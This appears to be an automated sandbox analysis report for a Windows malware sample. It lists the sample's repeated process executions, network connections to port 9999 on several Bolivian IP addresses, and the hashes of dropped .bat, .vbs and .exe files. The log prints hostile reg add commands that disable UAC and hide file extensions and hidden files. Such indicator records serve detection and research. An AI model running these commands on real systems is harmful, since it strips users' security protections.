cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PKcEcskk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fwgkQUsY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eqMskUwY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AEcgwQsQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eqswUsow.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LQIcwsYQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SCQQksMk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\TAAEYsog.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NIEMYYgc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PoAsEYIM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "800290335-1759537852-1215392385-392837485-1830295252-1349181723-326661077168394496"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zkIkIIkU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uwUYssck.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vecAwogc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\kycMMsso.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eOswgwoQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

Network

Country Destination Domain Proto
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
GB 142.250.200.14:80 google.com tcp
BO 200.87.164.69:9999 tcp
GB 142.250.200.14:80 google.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

memory/2352-0-0x0000000000400000-0x0000000000434000-memory.dmp

\Users\Admin\tIUAwkcA\WYUQIMko.exe

MD5 15c32f5d27df33284d113ece95f18ab3
SHA1 c610b1882ebf9c4849f5090d3d31e3ec6afaef6b
SHA256 e6a261f222632cba2f3158ffe188a4268f69aa3161b2e242243bd1452f493d6a
SHA512 220552b46c31b0603938bfeb83cdda8c7a92d378094643331930de41a9878a15759d22b29cdb5c61c1da48eeaeb7dfb1c0c5c929277c21a0ce777a81d66527cd

memory/2352-5-0x0000000003DB0000-0x0000000003DDF000-memory.dmp

memory/2900-13-0x0000000000400000-0x000000000042F000-memory.dmp

\ProgramData\XggMMcAg\LkAAYskU.exe

MD5 2ab37735d1252978401c416ceaa2166b
SHA1 f1b61163d9c4f4d7e785ab85e896d266b3de4ba4
SHA256 c5499c6b3a99f301cf84ac538964209d9deba921b4fbb8e86e59a00df3851afa
SHA512 bde085a189deb080d9edc54e7cc2b0bf8661e41f13c03485630eb7c61dcd02864f0e634da20c62e2a81c15b14728ed3ae0960634eee7315f07fb526b05501b25

memory/2352-16-0x0000000003DB0000-0x0000000003DE2000-memory.dmp

memory/1800-31-0x0000000000400000-0x0000000000432000-memory.dmp

memory/2352-29-0x0000000003DB0000-0x0000000003DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nKUcAUAk.bat

MD5 bd36b88e766802a29d69e9ce1477146e
SHA1 d899a5b462c421b22b636f1a34c8b7ae66da3fda
SHA256 d909028517c054943b8835eb1e7f100669faacba0834197aee8cbf977f443edb
SHA512 9ad3c8fe08d597a3d9a3086be54d83dbe3bfb1d069405e33d0731539b627b3e627839be9267996560a7afbc49ff2660c26bca67143866592f2fccba924600e65

memory/2512-33-0x0000000000340000-0x0000000000374000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IWMgwYQg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/2352-43-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2848-37-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2512-34-0x0000000000340000-0x0000000000374000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

MD5 672a1f1de82c3076688c129d2c89d0e2
SHA1 02e8f06ad6888c9fb28059f5eac065b7bbfdd365
SHA256 1d8a8607dd5b6aa413649cd3dc7187497e6a7fcb616e56c980fcfb682ee8c363
SHA512 e2a10f2636cad8f3fe790d68454b929831a0d0b23b1a8714188ac23df2d4af4ff134650050cc1bc9ce870d5200c7b5da41b18fc1a300a86556049879af78fb90

C:\Users\Admin\AppData\Local\Temp\PWcwIUwM.bat

MD5 77c23aef55c221bd4955a4d912d5cdcc
SHA1 1d9cacab24cb365101d692e0e90b129654d1c088
SHA256 78bc7f485cadaeadb01be3d1f28bbfd31e7d46adb57ccecbd4e8f5a2dff7eefe
SHA512 70bc9505e042256ddcb5d6e62cca59a3d58679cf65511fbe27f6d2a655644b3796cbb6a4fdd596c7535f3be3466a46b45301fac546dae576b93604a30175c7d6

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/2612-59-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2808-58-0x0000000000180000-0x00000000001B4000-memory.dmp

memory/2808-57-0x0000000000180000-0x00000000001B4000-memory.dmp

memory/2848-68-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sgYkcsIM.bat

MD5 70b31e10e0fd5fa2beed8525b3ef2c16
SHA1 7420ea8b42da8ee11eb5800e437a75198f10e72b
SHA256 897f43ce106af5387ea1a126ef1667dc25f3330d2c817944014cb5cb9e29c56f
SHA512 83b5314e14aa4cf98e9ef6d84df8fc731b27775af39a356c90f08ec3529225f95325190a46b6ed43165dbc16eaf9fed86c3ca974d8ce8dc907f66030c5929071

memory/1116-84-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2344-83-0x00000000001E0000-0x0000000000214000-memory.dmp

memory/2344-82-0x00000000001E0000-0x0000000000214000-memory.dmp

memory/2612-93-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AOIMosUI.bat

MD5 d6e51eb9fee70afcc7640e378c02b75f
SHA1 ee181fcae57481679621c65f32e1fb565823453d
SHA256 e8bb7667f0bff9b825731ed890a227140202ab8903b89aae31e39102166a4688
SHA512 cedf7f6c5058a04b68a3cd3c6925956a3bc71d511dd41685c5d639b299da36c53352786c02af0e352309acac080695a88b2a864190ffed781b7983cc893c3a3c

memory/2444-107-0x0000000000400000-0x0000000000434000-memory.dmp

memory/988-106-0x0000000000330000-0x0000000000364000-memory.dmp

memory/1116-116-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GgwMowQU.bat

MD5 22e61f842b34789314cd4e7e4a029509
SHA1 3037045bfc31f969bebdc3fcd94fe7520dd482d9
SHA256 9bc5c582c20dadcac0661a03669d660d4823497e4f9ca1d0b329104b991fe557
SHA512 3662750f52b74f550b57a868a19bcd0048cb434741a23d8836764490ec8f341351f333b9ff035e1cd68b4db5b619d453e7a1b19c8cdb24d2e38ba674d6ed5343

memory/1636-129-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1696-130-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2444-139-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RIogIksA.bat

MD5 e4b1c827ad10920cce00696c59cf29e6
SHA1 26b055a6f5f743544d2418214437b0382bb93600
SHA256 5a2c50b1582dda958a867daecd0a3cca672327ea40e87df9d2a764f6c2b871d8
SHA512 c0e67a301d00efba2e6d71d63c153e855aba3cd0732f2e6d4321c372c8dd57d99dfa61e5b8a4eb2498ee3e9f279e52dd92ed845bba8517d521bbe06d11cdea81

memory/3056-153-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2400-154-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1696-163-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wCQMEUMQ.bat

MD5 2eef5a5b498f50fb1960f0f94a28fda8
SHA1 82e33b9635505f44688abd54e3c05659076794f5
SHA256 7575a4615977bdc39ce49f12675f62da5eae9423c8cb8f063da17c6812f03a1d
SHA512 730c7c7c43ac3e488208f62891eae2727728cec8f78c99e92d6074bf09784dea88e0e87686fa1aa2f6319a4197e85be70f73afa8050d9a5285d72b9dfaaec0e6

memory/2764-177-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2772-179-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2764-178-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2400-188-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hoEgsAUk.bat

MD5 8c6e8a803c294e5cae9f11b9e788600c
SHA1 3545a5f40886c288006212b5850ee4bce6f3b8b9
SHA256 27da4f45b656348777d3ab53e7f3c3fae0dd2399de1ba65fb8b7a6a3b2ed2793
SHA512 9a7774a914cd3a15789135e47a162223cfcc9e3ba83e3c8cf89d1c20c4dda9496efb560c9eab562ff2e3295145d4c3de593a68afb3c35bf19d2a84bc878c35ef

memory/1728-201-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3044-202-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2772-211-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XUgkoMYg.bat

MD5 227cfbd8f13fb6ed308513ede8d6ce6e
SHA1 381c6b34d117b43864d63dc9d38ffb773c7d1e8a
SHA256 5525eda94d471eae73440f170516ca162eaafe793dfb4f8b7fa5ef5acbdac012
SHA512 b139654d12302a38f06fad6b020bef63f47123f4ccaefdba430a770bc8dd7ac15a07ced3052235ade862482fbdd804152491f608a0824603787f0e9dc9d54092

memory/1668-225-0x0000000000260000-0x0000000000294000-memory.dmp

memory/3044-233-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dYEUEcUg.bat

MD5 69b0849a7ae5bae1068ab0a19c77cfc2
SHA1 458f0ecbca344de0fc9488917f5e8652eba2ece8
SHA256 8378fd42766dec35de750f4601a747066bc26b2d79debfc4f62435d654bd3b46
SHA512 788db57f2985c114cb3090389df18571d1509fd92a43e41c9bf2d38e4f9bdaa6bc73e40bccb76be023bcf10d49b2f9a13ae621cb622bab1ffe1db037b15f5741

memory/1416-249-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1560-248-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1560-247-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3000-258-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZqsIEoUw.bat

MD5 6538e21889d16095713e8bbd64896813
